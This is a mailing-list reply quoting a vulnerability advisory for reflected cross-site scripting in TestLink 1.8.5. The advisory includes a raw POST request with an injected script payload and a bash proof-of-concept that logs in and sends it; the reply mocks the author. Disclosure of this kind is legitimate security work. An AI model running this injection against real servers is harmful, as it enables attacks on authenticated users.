Re: Cross site scriping Vulnerabilites in Testlink TestManagement and Execution System

[Jeff Williams <jeffwillis30 () gmail com>]

Prashant,

Usually we do not mention the engineer/dev name's in a timeline, that's
totaly a jackass move.
Anyone civilized would mention in this case :
"{DATE} <VENDOR NAME> says <CRAP>"

Btw posting an "exploit" to trigger a Js alert, it's priceless;
Dude you made my night.




2010/1/15 Prashant <clickprashant () rediffmail com>

> 1.Title :Cross site scriping Vulnerabilites in Testlink TestManagement and
> Execution System.
> Discovered by: Prashant Khandelwal (clickprashant () gmail com)
>
>
> 2.Vulnerability Information
> Class: Cross site scriping
> Impact :Code execution
> Remotely Exploitable: Yes
> Locally Exploitable: No
>
>
> 3. Vulnerable packages.
>
> Versions affected :All versions <= Testlink 1.8.5
> Download :
> http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc
>
>
> 4. Vulnerability Description
>
> Cross site scriping Vulnerability has been found in Testlink(
> http://www.teamst.org/) a popular and acclaimed free, open source Test
> management tool written in PHP.
> The issue discovered can only be exploited with an authenticated
> session.This cross site scripting vulnerability is present in the file
> /testlink/lib/usermanagement/usersView.php & can be exploited
> by setting the variable "order_by_login_dir" like below with a HTTP POST
> request
>
> Example HTTP header (tested on 1.8.5)
>
> Set the POST variable order_by_login_dir to >">alert(726367128870)%3B
>
> Request
>
> POST /testlink/lib/usermanagement/usersView.php HTTP/1.0
>
> Accept: */*
> Content-Type: application/x-www-form-urlencoded
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
> 1.1.4322)
> Host: x.x.x.x
> Content-Length: 146
> Cookie:
> PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381
> Connection: Close
> Pragma: no-cache
>
>
> operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(726367128870)%3B&user_order_by=order_by_login
>
>
> 5. Proof Of Concept
>
>
> ======================
> #!/usr/bin/env bash
> # Prashant Khandelwal [clickprashant () gmail com]
> # Cross site scripting in Testlink the Test Management Tool
>
> # Vendor : Testlink http://www.teamst.org
> # Affected Version : <=1.8.5 (
> http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc
> )
> # Vulnerability Discovered: 5-Jan-2010
> # This POC is for educational purpose and has only been tested with
> testlink 1.8.5
>
>
> if [ $# -ne 3 ]
> then
>
> echo "Usage - ./$0 User password Testlink_root_dir_URI"
> echo "Example - ./$0 admin admin http://Testlink-Server/testlink";
> exit 1
> fi
>
> rm -rf cookies userView.php
>
> curl -d "tl_login=$1&tl_password=$2" $3/login.php -c cookies
>
> curl -d
> '"operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(123456789)%3B&user_order_by=order_by_login"'
> $3/lib/usermanagement/usersView.php -b cookies -v >userView.php
>
> echo "Please open userView.php in browser a java script alert with text
> 123456789 should pop up"
>
>
> =====================
>
>
> 6. Report Timeline
>
> I) 5-Jan-2010
> Vulnerability dicovered
>
> II) 11-Jan-2010
>
> Notified about the vulnerability to the developer Francisco Mancardi &
> Martin Havlat from testlink team
>
> IV) 11-Jan-2010
> Francisco Mancardi ask for POC.
>
> V) 14-Jan-2010
> POC's given
>
> VI) 15-Jan-2010
> Francisco Mancardi says these vulnerabilities cannot be patched at the
> moment and has not commited any timeline for fixing the same.
>
>
> <http://sigads.rediff.com/RealMedia/ads/click_nx.ads/www.rediffmail.com/signatureline.htm@Middle?>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/